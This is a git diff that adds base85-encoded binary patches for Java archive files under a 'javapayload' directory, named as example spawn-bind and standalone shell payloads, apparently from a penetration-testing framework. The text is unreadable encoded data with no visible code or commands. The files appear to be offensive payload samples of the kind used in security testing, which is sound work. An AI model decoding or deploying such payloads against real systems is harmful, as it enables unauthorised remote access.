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
TuGBYTwD*{3Xg*i!BHI4}9_ys8

literal 0
HcmV?d00001

diff --git a/external/source/javapayload/example-spawn-bind.jar b/external/source/javapayload/example-spawn-bind.jar
new file mode 100644
index 0000000000000000000000000000000000000000..35ba0906b9586fed6abf3dba2323c328d0c87e69
GIT binary patch
literal 4539
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

literal 0
HcmV?d00001

diff --git a/external/source/javapayload/example-standalone-jsh.jar b/external/source/javapayload/example-standalone-jsh.jar
new file mode 100644
index 0000000000000000000000000000000000000000..5fe093067d12171d01023fd6ffeb11aaed9bb1d6
GIT binary patch
literal 10933
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
